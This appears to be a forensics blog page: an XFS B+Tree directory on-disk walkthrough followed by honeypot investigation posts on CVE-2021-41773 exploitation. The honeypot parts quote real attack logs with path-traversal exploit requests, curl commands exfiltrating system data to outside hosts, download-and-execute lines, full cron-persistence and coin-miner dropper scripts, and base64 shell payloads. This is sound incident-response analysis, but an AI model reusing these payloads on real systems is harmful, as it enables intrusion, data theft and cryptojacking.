XFS Part 6 – B+Tree Directories

Look here for earlier posts in this series.

Just to see what would happen, I created a directory containing 5000 files. Let’s start with the inode:

B+Tree Directory

The number of extents (bytes 76-79) is 0x2A, or 42. This is too many extents to fit in an extent array in the inode. The data fork type (byte 5) is 3, which means the data fork is the root of a B+Tree.

The root of the B+Tree starts at byte offset 176 (0x0B0), right after the inode core. The first two bytes are the level of this node in the tree. The value 1 indicates that this is an interior node in the tree, rather than a leaf node. The next two bytes are the number of entries in the arrays which track the nodes below us in the tree– there is only one node and one array entry. Four padding bytes are used to maintain 64-bit alignment.

The rest of the space in the data fork is divided into two arrays for tracking sub-nodes. The first array is made up for four byte logical offset values, tracking where each chunk of file data belongs. The second array is the absolute block address of the node which tracks the extents at the corresponding logical offset. In our case that block is 0x8118e4 = 8460516 (aka relative block 71908 in AG 2), which tracks the extents starting from the start of the file (logical offset zero).

This is a small file system and the absolute block addresses fit in 32 bits. What’s not clear in the documentation is what happens when the file system is large enough to require 64-bit block addresses? More research is needed here.

Let’s examine block 8460516 which holds the extent information. Here are the first 256 bytes in a hex editor:

B+Tree Directory Leaf

0-3     Magic number                        BMA3
4-5     Level in tree                       0 (leaf node)
6-7     Number of extents                   42
8-15    Left sibling pointer                -1 (NULL)

16-23   Right sibling pointer               -1 (NULL)
24-31   Sector offset of this block         0x02595720 = 39409440

32-39   LSN of last update                  0x200000631b
40-55   UUID                                e56c...da71
56-63   Inode owner of this block           0x022f4d7d = 36654461

64-67   CRC32 of this block                 0x9d14d936
68-71   Padding for 64-bit alignment        zeroed

This node is at level zero in the tree, which means it’s a leaf node containing data. In this case the data is extent structures, and there are 42 of them following the header.

If there were more than one leaf node, the left and right sibling pointers would be used. Since we only have the one leaf, both of these values are set to -1, which is used as a NULL pointer in XFS metadata structures.

As far as decoding the extent structures, it’s easier to use xfs_db:

xfs_db> inode 36654461
xfs_db> addr u3.bmbt.ptrs[1]
xfs_db> print
magic = 0x424d4133
level = 0
numrecs = 42
leftsib = null
rightsib = null
bno = 39409440
lsn = 0x200000631b
uuid = e56c3b41-ca03-4b41-b15c-dd609cb7da71
owner = 36654461
crc = 0x9d14d936 (correct)
recs[1-42] = [startoff,startblock,blockcount,extentflag] 
1:[0,4581802,1,0] 
2:[1,4581800,1,0] 
3:[2,4581799,1,0] 
4:[3,4581798,1,0] 
5:[4,4581794,1,0] 
6:[5,4581793,1,0] 
7:[6,4581791,1,0] 
8:[7,4581790,1,0] 
9:[8,4581789,1,0] 
10:[9,4581787,1,0] 
11:[10,4581786,1,0] 
12:[11,4582219,1,0] 
13:[12,4582236,1,0] 
14:[13,4587210,1,0] 
15:[14,4688117,3,0] 
16:[17,4695931,1,0] 
17:[18,4695948,1,0] 
18:[19,4701245,1,0] 
19:[20,4703737,1,0] 
20:[21,4706394,1,0] 
21:[22,4711526,1,0] 
22:[23,4714191,1,0] 
23:[24,4721971,1,0] 
24:[25,4729743,1,0] 
25:[26,4740155,1,0] 
26:[27,4742820,1,0] 
27:[28,4745312,1,0] 
28:[29,4747961,1,0] 
29:[30,4753101,1,0] 
30:[31,4761038,1,0] 
31:[32,4768818,1,0] 
32:[33,4776747,1,0] 
33:[34,4797727,1,0] 
34:[8388608,4581801,1,0] 
35:[8388609,4581796,1,0] 
36:[8388610,4581795,1,0] 
37:[8388611,4581792,1,0] 
38:[8388612,4581788,1,0] 
39:[8388613,8459337,1,0] 
40:[8388614,8460517,2,0] 
41:[8388616,8682827,7,0] 
42:[16777216,4581797,1,0]

As we saw in the previous installment, multi-block directories in XFS are sparse files:

  • Starting at logical offset zero, we have extents 1-33 containing the first 35 blocks of the directory file. This is where the directory entries live.
  • Extents 34-41 starting at logical offset 8388608 (XFS_DIR2_LEAF_OFFSET) contain the hash lookup table for finding directory entries.
  • Because the hash lookup table is large enough to require multiple blocks, the “tail record” for the directory moves into its own block tracked by the final extent (extent 42 in our example above). The logical offset for the tail record is 2*XFS_DIR2_LEAF_OFFSET or 16777216.

The Tail Record

0-3      Magic number                       XDF3
4-7      CRC32 checksum                     0xf56e9aba
8-15     Sector offset of this block        22517032

16-23    Last LSN update                    0x200000631b
24-39    UUID                               e56c...da71
40-47    Inode that points to this block    0x022f4d7d

48-51    Starting block offset              0
52-55    Size of array                      35
56-59    Array entries used                 35
60-63    Padding for 64-bit alignment       zeroed

The last two fields describe an array whose elements correspond to the blocks in the hash lookup table for this directory. The array itself follows immediately after the header as shown above. Each element of the array is a two-byte number representing the largest chunk of free space available in each block. In our example, all of the blocks are full (zero free bytes) except for the last block which has at least a 0x0440 = 1088 byte chunk available.

Decoding the Hash Lookup Table

The hash lookup table for this directory is contained in the fifteen blocks starting at logical file offset 8388608. Because the hash lookup table spans multiple blocks, it is also formatted as a B+Tree. The initial block at logical offset 8388608 should be the root of this tree. This block is shown below.

0-3      "Forward" pointer                  0
4-7      "Back" pointer                     0
8-9      Magic number                       0x3ebe
10-11    Padding for alignment              zeroed
12-15    CRC32 checksum                     0x129cf461

16-23    Sector offset of this block        22517064
24-31    LSN of last update                 0x200000631b

32-47    UUID                               e56c...da71

48-55    Parent inode                       0x022f4d7d
56-57    Number of array entries            14
58-59    Level in tree                      1
59-63    Padding for alignment              zeroed

We confirm this is an interior node of a B+Tree by looking at the “Level in tree” value at bytes 58-59– interior nodes have non-zero values here. The “forward” and “back” pointers being zeroed mean there are no other nodes at this level, so we’re sitting at the root of the tree.

The fourteen other blocks that hold the directory entries are tracked by an array here in the root block. Bytes 56-57 track the size of the array, and the array itself starts at byte 64. Each array entry contains a four byte hash value and a four byte logical block offset. The hash value in each array entry is the largest hash value in the given block.

It’s easier to decode these values using xfs_db:

xfs_db> fsblock 4581801
xfs_db> type dir3
xfs_db> p
nhdr.info.hdr.forw = 0
nhdr.info.hdr.back = 0
nhdr.info.hdr.magic = 0x3ebe
nhdr.info.crc = 0x129cf461 (correct)
nhdr.info.bno = 22517064
nhdr.info.lsn = 0x200000631b
nhdr.info.uuid = e56c3b41-ca03-4b41-b15c-dd609cb7da71
nhdr.info.owner = 36654461
nhdr.count = 14
nhdr.level = 1
nbtree[0-13] = [hashval,before]
0:[0x4863b0b3,8388610]
1:[0x4a63d132,8388619]
2:[0x4c63d1f3,8388615]
3:[0x4e63f070,8388622]
4:[0x9c46fd6d,8388612]
5:[0xa446fd6d,8388621]
6:[0xac46fd6d,8388618]
7:[0xb446fd6d,8388616]
8:[0xbc275ded,8388614]
9:[0xbc777c6d,8388609]
10:[0xc463d170,8388611]
11:[0xc863f170,8388620]
12:[0xcc63d072,8388613]
13:[0xce63f377,8388617]

If you look at the residual data in the block after the hash array, it looks like hash values and block offsets similar to what we’ve seen in previous installments. I speculate that this is residual data from when the hash lookup table was able to fit into a single block. Once the directory grew to a point where the B+Tree was necessary, the new B+Tree root node simply took over this block, leaving a significant amount of residual data in the slack space.

To understand the function of the leaf nodes in the B+Tree, suppose we wanted to find the directory entry for the file “0003_smallfile”. First we can use xfs_db to compute the hash value for this filename:

xfs_db> hash 0003_smallfile
0xbc07fded

According to the array, that hash value should be in logical block 8388614. We then have to refer back to the list of extents we decoded earlier to discover that this local offset corresponds to block address 8460517 (AG 2, block 71909). Here is the breakdown of that block:

0-3      Forward pointer                    0x800001 = 8388609
4-7      Back pointer                       0x800008 = 8388616
8-9      Magic number                       0x3dff
10-11    Padding for alignment              zeroed
12-15    CRC32 checksum                     0xdb227061

16-23    Sector offset of this block        39409448
24-31    LSN of last update                 0x200000631b

32-47    UUID                               e56c...da71

48-55    Parent inode                       0x022f4d7d
56-57    Number of array entries            0x01a0 = 416
58-59    Unused entries                     0
59-63    Padding for alignment              zeroed

Following the 64-byte header is an array holding the hash lookup structures. Each structure contains a four byte hash value and a four byte offset. The array is sorted by hash value for binary search. Offsets are in 8 byte units.

The has value for “0003_smallfile” was 0xbc07fded. We have to look fairly far down in the array to find the offset for this value:

The offset tells us that the directory entry of “0003_smallfile” should be 0x13 = 19 * 8 = 152 bytes from the start of the directory file. That puts it near the beginning of the first block at logical offset zero.

The Directory Entries

To find the first block of the directory file we need to refer back to the extent list we decoded from the inode at the very start of this article. According to that list, the initial block is 4581802 (AG 1, block 387498). Let’s take a closer look at this block:

0-3      Magic number                       XDD3
4-7      CRC32 checksum                     0xaf173b31
8-15     Sector offset to this block        22517072

16-23    LSN of last update                 0x200000631b
24-39    UUID                               e56c...da71
40-47    Parent inode                       0x022f4d7d

Bytes 48-59 are a three element array indicating where there is available free space in this directory. Each array element is a 2 byte offset (in bytes) to the free space and a 2 byte length (in bytes). There is no free space in this block, so all array entries are zeroed. Bytes 60-63 are padding for alignment.

Following this header are variable length directory entries defined as follows:

     Len (bytes)     Field
     ===========     ======
       8             absolute inode number
       1             file name length (bytes)
       varies        file name
       1             file type
       varies        padding as necessary for 64bit alignment
       2             offset to beginning of this entry

Here is the decoding of the directory entries shown above:

    Inode        Len    File Name         Type    Offset
    =====        ===    =========         ====    ========
    0x022f4d7d    1     .                 2       0x0040
    0x04159fa1    2     ..                2       0x0050
    0x022f4d7e   14     0001_smallfile    1       0x0060
    0x022f4d7f   12     0002_bigfile      1       0x0080
    0x022f4d80   14     0003_smallfile    1       0x0098
    0x022f4d81   12     0004_bigfile      1       0x00B8

File type bytes are as described in Part Three of this series (1 is a regular file, 2 is a directory). Note that the starting offset of the “0003_smallfile” entry is 152 bytes (0x0098), exactly as the hash table lookup told us.

What Happens Upon Deletion?

Let’s see what happens when we delete “0003_smallfile”. When doing this sort of testing, always be careful to force the file system cache to flush to disk before busting out the trusty hex editor:

# rm -f /root/dir-testing/bigdir/0003_smallfile
# sync; echo 3 > /proc/sys/vm/drop_caches

The mtime and ctime in the directory inode are set to the deletion time of “0003_smallfile”. The LSN and CRC32 checksum in the inode are also updated.

The removal of a single file is typically not a big enough event to modify the size of the directory. In this case, neither the extent tree root or leaf block changes. We would have to purge a significant number of files the impact this data.

However, the “tail record” for the directory is impacted by the file deletion.

The CRC32 checksum and LSN (now highlighted in red) are updated. Also the free space array now shows 0x20 = 32 bytes free in the first block.

Again, a single file deletion is not significant enough to impact the root of the hash B+Tree. However, one of the leaf nodes does register the change.

Again we see updates to the CRC32 checksum and LSN fields. The “Unused entries” field for the hash array now shows one unused entry. Looking farther down in the block, we find the unused entry for our hash 0xbc07fded. The offset is zeroed to indicate this entry is unused. We saw similar behavior in other block-based directories in previous installments of this series.

Changes to the directory entries are also similar to the behavior we’ve seen previously for block-based directory files:

Again we see the usual CRC32 and LSN updates. But now the free space array starting at byte 48 shows 0x0020 = 32 bytes free at offset 0x0098 = 152. The first two bytes of the inode field in this directory are overwritten with 0xFFFF to indicate the unused space, and the next two bytes indicate 0x0020 = 32 bytes of free space. However, since the inodes in this file system fit in 32 bits, the original inode number for the file is still fully visible and the file could potentially be recovered using residual data in the inode.

Wrapping Up and Planning for the Future

This post concludes my walk-through of the major on-disk data structures in the XFS file system. If anything was unclear or you want more detailed explanations in any area, feel free to reach me through the comments or via any of my social media accounts.

The colorized hex dumps that appear in these posts where made with a combination of Synalize It! and Hexinator. Along the way I created “grammar” files that you can use to produce similar colored breakdowns on your own XFS data structures.

I have multiple pages of research questions that came up as I was working through this series. But what I’m most interested in at the moment is the process of recovering deleted data from XFS file systems. This is what I will be looking at in upcoming posts.

Advertisement

Hudak’s Honeypot (Part 4)

This is part four in a series. Check out part one, part two, and part three if you missed them.

Reviewing the UAC data during the triage phase of our investigation, we noted two similar process hierarchies started on Nov 30. One started with parent PID 15851 and the other with parent PID 21783. The processes were running as the same “daemon” user as the web server. Looking at the UAC data under …/live_response/process/proc/<PID>/environ.txt shows essentially identical markers typical of CVE-2021-41773 exploitation:

HTTP_USER_AGENT=curl/7.79.1
REQUEST_METHOD=POST
REQUEST_URI=/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash
SCRIPT_NAME=/cgi-bin/../../../../../../../bin/bash

The “environ.txt” data shows that PID 15851 was started by a request from IP 5.2.72.226 and PID 21783 from 104.244.76.13.

Next I pivoted to the web logs in the image under /var/log/apache2, looking for entries that used the same “curl/7.79.1” user agent string. Many of the hits were from 116.202.187.77, which we researched in part three of this series. Here are the remaining hits with the matching user agent string:

107.189.14.119 - - [29/Nov/2021:21:27:46 +0000] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//bin/sh HTTP/1.1" 200 45 "-" "curl/7.79.1"
45.153.160.138 - - [29/Nov/2021:21:30:38 +0000] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//bin/curl HTTP/1.1" 404 196 "-" "curl/7.79.1"
185.165.171.175 - - [29/Nov/2021:21:33:42 +0000] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//bin/sh HTTP/1.1" 200 - "-" "curl/7.79.1"
185.31.175.231 - - [29/Nov/2021:22:07:03 +0000] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash HTTP/1.1" 200 53 "-" "curl/7.79.1"
185.56.80.65 - - [29/Nov/2021:22:09:25 +0000] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash HTTP/1.1" 200 53 "-" "curl/7.79.1"
185.243.218.50 - - [29/Nov/2021:22:11:50 +0000] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash HTTP/1.1" 200 53 "-" "curl/7.79.1"
109.70.100.34 - - [29/Nov/2021:22:13:14 +0000] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash HTTP/1.1" 200 53 "-" "curl/7.79.1"
109.70.100.26 - - [30/Nov/2021:16:04:46 +0000] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash HTTP/1.1" 200 53 "-" "curl/7.79.1"
5.2.72.226 - - [30/Nov/2021:16:19:28 +0000] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash HTTP/1.1" 200 - "-" "curl/7.79.1"
104.244.76.13 - - [30/Nov/2021:16:27:39 +0000] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash HTTP/1.1" 200 - "-" "curl/7.79.1"
91.234.192.109 - - [07/Dec/2021:13:57:42 +0000] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//bin/sh HTTP/1.1" 200 45 "-" "curl/7.79.1"

All of the IPs shown here are known Tor exit nodes, except for the final IP 91.234.192.109. According to WHOIS data, 91.234.192.109 is registered to Elisteka UAB, and small company in Lithuania.

Next I pulled the mod_dumpio data for these IPs from the error_log:

[Mon Nov 29 21:27:47.012697 2021]  echo Content-Type: text/plain; echo; id
[Mon Nov 29 21:30:38.095283 2021]  echo Content-Type: text/plain; echo; https://webhook.site/d9680fb0-b157-46a0-bc55-bcd195d139eb
[Mon Nov 29 21:33:42.311129 2021]  echo Content-Type: text/plain; echo;
[Mon Nov 29 22:07:04.059102 2021]  echo Content-Type: text/plain; echo; curl 8u3f3p0skq5deucdmc1xu88qnht8hx.burpcollaborator.net
[Mon Nov 29 22:09:25.063142 2021]  echo Content-Type: text/plain; echo; curl gk4ntxq0ayvl422lckr5kgyydpjh76.burpcollaborator.net
[Mon Nov 29 22:11:50.309729 2021]  echo Content-Type: text/plain; echo; cat /proc/cpuinfo | curl --data-binary @- cs8j1tywiu3hcyahkgz1sc6ullref3.burpcollaborator.net
[Mon Nov 29 22:13:14.410907 2021]  echo Content-Type: text/plain; echo; ps -eo pid,ppid,cmd,%mem,%cpu --sort=-%cpu | head | curl --data-binary @- cs8j1tywiu3hcyahkgz1sc6ullref3.burpcollaborator.net
[Tue Nov 30 16:04:46.326600 2021]  echo Content-Type: text/plain; echo; id | curl --data-binary @- 7jrfbas00fc0onj2p41ovgegm7sxgm.burpcollaborator.net
[Tue Nov 30 16:19:28.956301 2021]  echo Content-Type: text/plain; echo; (curl https://tmpfiles.org/dl/168017/wk.sh | sh >/dev/null 2>&1 )&
[Tue Nov 30 16:27:39.818920 2021]  echo Content-Type: text/plain; echo; (curl https://tmpfiles.org/dl/168017/wk.sh | sh >/dev/null 2>&1 )&
[Tue Dec 07 13:57:42.522498 2021]  echo Content-Type: text/plain; echo; id

Unfortunately, all of these URLs were either unresponsive or returned “Not found” errors. It would have been the “hxxps://tmpfiles.org/dl/168017/wk.sh” URLs that started our suspicious process hierarchies.

In addition to the suspicious process hierarchies started on Nov 30, the UAC data also showed a suspicious agetty process (PID 24330) running as user daemon, started on Dec 5. …/live_response/process/proc/24330/environ.txt showed data matching the …/proc/15851/environ.txt data:

REMOTE_ADDR=5.2.72.226
REMOTE_PORT=47374
HTTP_USER_AGENT=curl/7.79.1

PWD=/tmp
OLDPWD=/tmp

REQUEST_METHOD=POST
REQUEST_URI=/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash
SCRIPT_NAME=/cgi-bin/../../../../../../../bin/bash
SCRIPT_FILENAME=/bin/bash
CONTEXT_PREFIX=/cgi-bin/
CONTEXT_DOCUMENT_ROOT=/usr/lib/cgi-bin/

The lsof data captured by UAC showed the process binary, /tmp/agettyd, was deleted. But since the process was still running at the time the disk image was captured, the inode data associated with the process executable was not cleared. The lsof data says the inode number is 30248, and recovering the deleted executable is now straightforward:

# icat /dev/loop0 30248 >/tmp/agetty-deleted
# md5sum /tmp/agetty-deleted
e83658008d6d9dc6fe5dbb0138a4942b  /tmp/agetty-deleted
# strings -a /tmp/agetty-deleted
[... snip ...]
Usage: xmrig [OPTIONS]
Network:
  -o, --url=URL                 URL of mining server
  -a, --algo=ALGO               mining algorithm https://xmrig.com/docs/algorithms
      --coin=COIN               specify coin instead of algorithm
  -u, --user=USERNAME           username for mining server
  -p, --pass=PASSWORD           password for mining server
  -O, --userpass=U:P            username:password pair for mining server
[... snip ...]

Ho hum, just another coin miner. Doubtless this is what was burning up the CPU in Tyler’s Azure image.

Wrapping Up

I estimate this investigation took me roughly eight hours, plus another eight hours to write up these blog posts. Is there more to investigate in this image? Most certainly! We’ve only scratched the surface of the mod_dumpio data in /var/log/apache2/error_log. There is still a great deal of data in there to keep your Threat Intel teams happy.

For example, how about this sequence:

[Sun Nov 07 10:39:12.876655 2021]  A=|echo;curl -s http://103.55.36.245/0_cron.sh -o 0_cron.sh || wget -q -O 0_cron.sh http://103.55.36.245/0_cron.sh; chmod 777 0_cron.sh; sh 0_cron.sh
[Sun Nov 07 10:52:33.141762 2021]  A=|echo;curl -s http://103.55.36.245/0_linux.sh -o 0_linux.sh || wget -q -O 0_linux.sh http://103.55.36.245/0_linux.sh; chmod 777 0_linux.sh; sh 0_linux.sh

Both of these URLs are responsive. Here’s “0_cron.sh”:

#!/bin/bash

(crontab -l 2> /dev/null; echo "* * * * * wget -q -O - http://103.55.36.245/0_linux.sh | sh > /dev/null 2>&1")| crontab -
(crontab -l 2> /dev/null; echo "* * * * * curl -s http://103.55.36.245/0_linux.sh | sh > /dev/null 2>&1")| crontab -; rm -rf 0_cron.sh

And here’s “0_linux.sh”:

#!/bin/bash

p=$(ps aux | grep -E 'linuxsys|jailshell' | grep -v grep | wc -l)
if [ ${p} -eq 1 ];then
    echo "Aya keneh proses. Tong waka nya!"
    exit
elif [ ${p} -eq 0 ];then
    echo "Sok bae ngalangkung weh!"
    # Execute linuxsys
    cd /dev/shm ; curl -s http://shumoizolyaciya.12volt.ua/wp-content/config.json -o config.json || wget -q -O config.json http://shumoizolyaciya.12volt.ua/wp-content/config.json; curl -s http://shumoizolyaciya.12volt.ua/wp-content/linuxsys -o linuxsys || wget -q -O linuxsys http://shumoizolyaciya.12volt.ua/wp-content/linuxsys; chmod +x linuxsys; ./linuxsys; rm -rf 0_linux.sh; rm -rf /tmp/*; rm -rf /var/tmp/*; rm -rf /tmp/.*; rm -rf /var/tmp/.*; rm -rf config.json; rm -rf linuxsys;
    # Kill All Process
    killall -9 kinsing; killall -9 kdevtmpfsi; killall -9 .zshrc; pkill -9 kinsing; pkill -9 kdevtmpfsi; pkill -9 .zshrc; pkill -9 lb64; pkill -9 ld-linux-x86-64; pkill -9 apac; pkill -9 sshd; pkill -9 syslogd; pkill -9 apache2; pkill -9 klogd; pkill -9 xmrig; pkill -9 sysls; pkill -9 bash; pkill -9 acpid; pkill -9 httpd; pkill -9 apach; pkill -9 apache; pkill -9 php; pkill -9 logo.gif; pkill -9 cron; pkill -9 go; pkill -9 logrunner; pkill -9 english; pkill -9 perl
fi

Google Translate identifies the language here as Sudanese (“There is still a process…”). Welcome to the global internet everybody!

Hudak’s Honeypot (Part 3)

This is part three in a series. Follow these links for part one and part two.

During our triage of the UAC data from the honeypot, we noted a process hierarchy running from the deleted /var/tmp/.log/101068/.spoollog directory. Shell process PID 20645 was the parent process of PID 6388, “sleep 300”. Both processes were started on Nov 14 and ran as “daemon”, the same user as the vulnerable web server on the honeypot.

Digging deeper into the UAC data, …/live_response/process/proc/20645/environ.txt provides some more clues about how this process hierarchy started. I’m reorganizing and reproducing some of the more useful data from this file below:

REMOTE_ADDR=116.202.187.77
REMOTE_PORT=56590
HTTP_USER_AGENT=curl/7.79.1

HOME=/var/tmp/.log/101068/.spoollog/.api
PWD=/var/tmp/.log/101068/.spoollog
OLDPWD=/var/tmp
PYTHONUSERBASE=/var/tmp/.log/101068/.spoollog/.api/.mnc

REQUEST_METHOD=POST
REQUEST_URI=/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
SCRIPT_NAME=/cgi-bin/../../../../bin/sh
SCRIPT_FILENAME=/bin/sh
CONTEXT_PREFIX=/cgi-bin/
CONTEXT_DOCUMENT_ROOT=/usr/lib/cgi-bin/

You can see the typical pattern for the CVE-2021-41773 RCE exploit in the request URI. The home directory and other directory paths match the deleted directory we observed elsewhere in the UAC data. And we can see the source of the malicious request is 116.202.187.77, which according to WHOIS belongs to a German hosting provider, Hetzner.

Nov 14 – So much base64 encoded shell code

Pivoting into the honeypot web logs under /var/log/apache2, we find 80 requests from this IP. There are four requests on Nov 14:

116.202.187.77 - - [14/Nov/2021:01:10:17 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 9 "-" "curl/7.79.1"
116.202.187.77 - - [14/Nov/2021:01:14:04 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 11 "-" "curl/7.79.1"
116.202.187.77 - - [14/Nov/2021:01:25:50 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 5 "-" "curl/7.79.1"
116.202.187.77 - - [14/Nov/2021:03:12:39 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 24 "-" "curl/7.79.1"

The remaining web requests are all from Nov 27 – Dec 1.

But it’s the mod_dumpio data in the error_log that’s really interesting:

[Sun Nov 14 01:10:17.692078 2021]  A=|echo;echo vulnable
[Sun Nov 14 01:14:04.802548 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin;curl -s http://116.203.212.184/1010/b64.php -u client:%@123-456@% --data-urlencode 's=aWYgWyAhICIkKHBzIGF1eCB8IGdyZXAgLXYgZ3JlcCB8IGdyZXAgJy5zcmMuc2gnKSIgXTsgdGhlbgoJcHJpbnRmICViICJubyBwcm9jZXNzXG4iCmVsc2UKCXByaW50ZiAlYiAicnVubmluZ1xuIgpmaQo=' | sh
[Sun Nov 14 01:25:50.735008 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin;curl -s http://116.203.212.184/1010/b64.php -u client:%@123-456@% --data-urlencode 's=UEFUSD0vc2JpbjovYmluOi91c3Ivc2JpbjovdXNyL2JpbjovdXNyL2xvY2FsL2JpbjtpcGF0aD0nbnVsbCc7IGZvciBsaW5lIGluICQoZmluZCAvdmFyL2xvZyAtdHlwZSBkIDI+IC9kZXYvbnVsbCk7IGRvIGlmIFsgLXcgJGxpbmUgXTsgdGhlbiBpcGF0aD0kbGluZTsgYnJlYWs7IGZpOyBkb25lOyBpZiBbICIkaXBhdGgiID0gIm51bGwiIF07IHRoZW4gaXBhdGg9JChjYXQgL2V0Yy9wYXNzd2QgfCBncmVwICJeJCh3aG9hbWkpIiB8IGN1dCAtZDogLWY2KTsgZm9yIGxpbmUgaW4gJChmaW5kICRpcGF0aCAtdHlwZSBkIDI+IC9kZXYvbnVsbCk7IGRvIGlmIFsgLXcgJGxpbmUgXTsgdGhlbiBpcGF0aD0kbGluZTsgYnJlYWs7IGZpOyBkb25lOyBpZiBbICEgLXcgJGlwYXRoIF07IHRoZW4gaXBhdGg9Jy92YXIvdG1wJzsgaWYgWyAhIC13ICRpcGF0aCBdOyB0aGVuIGlwYXRoPScvdG1wJzsgZmk7IGZpOyBmaTsgaWYgWyAhICIkKHBzIGF1eCB8IGdyZXAgLXYgZ3JlcCB8IGdyZXAgJy5zcmMuc2gnKSIgXTsgdGhlbiBjZCAkaXBhdGggJiYgaWYgWyAhIC1kICIubG9nLzEwMTA2OCIgXTsgdGhlbiBpPTEwMTAwMDt3aGlsZSBbICRpIC1uZSAxMDExMDAgXTsgZG8gaT0kKCgkaSsxKSk7IG1rZGlyIC1wIC5sb2cvJGkvLnNwb29sbG9nOyBkb25lICYmIGNkIC5sb2cvMTAxMDY4Ly5zcG9vbGxvZyAmJiBlY2hvICdhcGFjaGUnID4gLnBpbmZvICYmIENVUkw9ImN1cmwiO0RPTT0icnIuYmx1ZWhlYXZlbi5saXZlIjtvdXQ9JChjdXJsIC1zIC0tY29ubmVjdC10aW1lb3V0IDMgaHR0cDovL3JyLmJsdWVoZWF2ZW4ubGl2ZS8xMDEwL29ubGluZS5waHAgLXUgY2xpZW50OiVAMTIzLTQ1NkAlIDI+IC9kZXYvbnVsbCk7ZW5hYmxlPSQoZWNobyAkb3V0IHwgYXdrICd7c3BsaXQoJDAsYSwiLCIpOyBwcmludCBhWzFdfScpO29ubGluZT0kKGVjaG8gJG91dCB8IGF3ayAne3NwbGl0KCQwLGEsIiwiKTsgcHJpbnQgYVsyXX0nKTsgaWYgWyAhICIkZW5hYmxlIiAtZXEgIjEiIC1hICEgIiRvbmxpbmUiIC1lcSAiMSIgXTsgdGhlbiBpZmFjZXM9IiI7IGlmIFsgIiQoY29tbWFuZCAtdiBpcCAyPiAvZGV2L251bGwpIiBdOyB0aGVuIGlmYWNlcz0kKGlwIC00IC1vIGEgfCBjdXQgLWQgJyAnIC1mIDIsNyB8IGN1dCAtZCAnLycgLWYgMSB8IGF3ayAtRicgJyAne3ByaW50ICQxfScgfCB0ciAnXG4nICcgJyk7ICBlbHNlIGlmIFsgIiQoY29tbWFuZCAtdiBpZmNvbmZpZyAyPiAvZGV2L251bGwpIiBdOyB0aGVuIGlmYWNlcz0kKGlmY29uZmlnIC1hIHwgZ3JlcCBmbGFncyB8IGF3ayAne3NwbGl0KCQwLGEsIjoiKTsgcHJpbnQgYVsxXX0nIHwgdHIgJ1xuJyAnICcpOyBmaTsgZmk7IGZvciBldGggaW4gJGlmYWNlczsgZG8gb3V0PSQoY3VybCAt
